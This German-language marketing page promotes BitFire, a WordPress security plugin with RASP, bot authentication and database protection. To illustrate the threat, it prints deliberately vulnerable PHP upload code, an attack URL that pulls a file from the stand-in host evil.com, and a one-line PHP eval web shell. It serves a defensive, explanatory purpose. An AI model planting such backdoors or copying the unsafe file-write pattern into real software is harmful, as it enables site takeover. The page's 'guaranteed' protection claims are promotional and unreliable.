BitFire ist ein neuer Ansatz für die Sicherheit von WordPress, der die erste für WordPress verfügbare Runtime Application Self Protection (RASP) integriert.
Kostenloser StartRuntime Application Self Protection ist eine Sicherheits-Sandbox für Ihre gesamte Website. Eine herkömmliche WAF läuft vor Ihrer Website und blockiert oder erlaubt den Datenverkehr auf der Grundlage von Signaturen, die einen Angriff erkennen können oder auch nicht. RASP läuft zwischen Ihrer Website und dem Betriebssystem und verhindert nicht autorisierte Datenbank- und Dateisystemänderungen.
BitFire Free installieren* Kostenlose 5-minütige Installation. Keine Kreditkarte erforderlich.
Zusätzlich zu dem Standardschutz, den andere WAF-Lösungen bieten, verfügt BitFire über 4 einzigartige Merkmale die hinter Ihrer Website laufen und Ihr Dateisystem, Ihre Datenbank und Ihre Client-Webbrowser nahtlos und ohne Signaturen schützen.
RASP sperrt Ihre PHP-Dateien zum Schreiben, um zu verhindern, dass Angreifer Ihre Plugins oder Kerndateien verändern.
99 % der Hacks sind automatisiert. Die Netzwerkauthentifizierung lässt nur bekannte, autorisierte Bots zu und sperrt Hacker aus.
Verhindern Sie Redirect- und andere Browser-Angriffe, indem Sie mit Auto-CSP nur Inhalte von zugelassenen Websites erzwingen.
Vervollständigen Sie Ihr Sicherheitskonzept mit einem Datenbankschutz, der Backdoor-Konten und andere Datenbank-Malware verhindert.
BitFire's RASP läuft zwischen WordPress (oder jedem PHP-Code) und den Dateien Ihres Betriebssystems. Es ist in der Lage, die schwerwiegendsten Sicherheitslücken zu verhindern, die auf Ihrer Website ausgenutzt werden können. Betrachten Sie die folgende Sicherheitslücke, bei der ein Plugin ein entferntes Bild abruft und auf der lokalen Website speichert:
<?php
$r = $_GET['remote_image'];
// fetch remote image:
$data = file_get_contents($image);
// local file name = content_dir + original filename
$filename = WP_CONTENT_DIR . basename($image);
// save image for local use:
💀 file_put_contents($filename, $data);
<?php
# 🔭 did you spot the vulnerability? ~~~~~~~
# The plugin forgot to ensure that the file is an image file:
💀 file_put_contents($filename, $data);
# This vulnerability allows anyone to upload backdoor PHP code...~~
<?php
# www.site.com/vulnerable?remote_image=http://evil.com/backdoor.php
# backdoor.php:
echo '🦠 <?php eval($_GET["x"]);\n'; ~~
# This "image" is a backdoor executing any PHP code ~~~~
😧 ~~~~~
# Resulting in complete compromise of all website files and data! ~~~~~
😵
<?php
# BitFire protects vulnerable plugin code like this by
# intercepting all file writes before they execute:
💀 file_put_contents($_GET['name'], $_GET['data']);~~~
# And preventing any writes to a PHP file by a non-administrator.
~~~💓~~~~💓~~~💓~~~
# Without any custom extensions, guaranteed ~~~🥂~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacker geben sich oft als Internet-Bots wie GoogleBot usw. aus. Andere WAFs blockieren Bots in der Hoffnung, dass sie sich selbst identifizieren. Nur BitFire authentifiziert das Quellnetzwerk der Bots, um den authentischen Datenverkehr zu überprüfen.
Jeder Bot kann so konfiguriert werden, dass er von überall aus zugelassen, mit authentifizierter IP oder vollständig blockiert wird, und BitFire kann benutzerdefinierte oder unbekannte Bots lernen, so dass Sie vollständig abgesichert sind.
Sichern Sie sensible Daten mit der BitFire RASP-Datenbank. Schützen Sie Benutzer-Login-Daten, Blog-Posts, Produkt-Informationen und alle anderen sensiblen Datenbank-Informationen. BitFire kann den Zugriff oder die Änderung jeder Datenbankkomponente durch unbefugte Benutzer unabhängig von einer bestehenden Sicherheitslücke verhindern.
Vollständiger garantierter Schutz in weniger als 2 Millisekunden *
Schützen Sie sich mit Sicherheitsprozessen vor 0-Day-Bedrohungen nicht nur Unterschriften.
Umfassende Kundenbetreuung
Support 7 Tage pro Woche durch Entwickler in den USA
Unterstützung bei der Installation
Sie erhalten 1 Stunde kostenlosen technischen Support bei der Installation
24x7 Netzwerküberwachung
Alle Installationen erhalten eine kostenlose automatische Systemüberwachung
WordPress Plugin Überwachung
Stündliche Plugin-Prüfungen auf die neuesten Sicherheitslücken halten Ihre Website auf dem neuesten Stand
Offsite-Datenbank-Backups
Gigabytes an externen Datenbanksicherungen mit einem einzigen Klick
Ihre Sicherheit sollte vernetzt und mobil sein. BitFire verbindet sich mit anderen Quellen, damit Sie sicher bleiben.
Senden Sie mit einem einfachen Plugin automatisch Warnmeldungen und Standortinformationen in einem Kanal.
Bleiben Sie auf dem Laufenden, was die Sicherheit anbelangt, mit umsetzbaren Sicherheitsberichten, um sicherzustellen, dass Ihre Website auf dem neuesten Stand ist.
Stellen Sie eine bereits gehackte Website wieder her und verhindern Sie benutzerdefinierte Angriffe auf den WordPress-Kern und Plugins.
Stellen Sie eine direkte Verbindung zur REST-HTTP-API her, um die neuesten Daten abzurufen und die Firewall dynamisch zu konfigurieren und zu integrieren.
Einfache Verbindung mit der elastischen Suche zum Speichern und Berichten über blockierten und erlaubten Datenverkehr in Echtzeit.
Integrieren Sie BitFire ganz einfach in jedes PHP-Projekt, einschließlich benutzerdefinierter und selbst entwickelter Anwendungen.
Wir können Ihnen helfen, das Problem der Web-Sicherheit zu lösen.
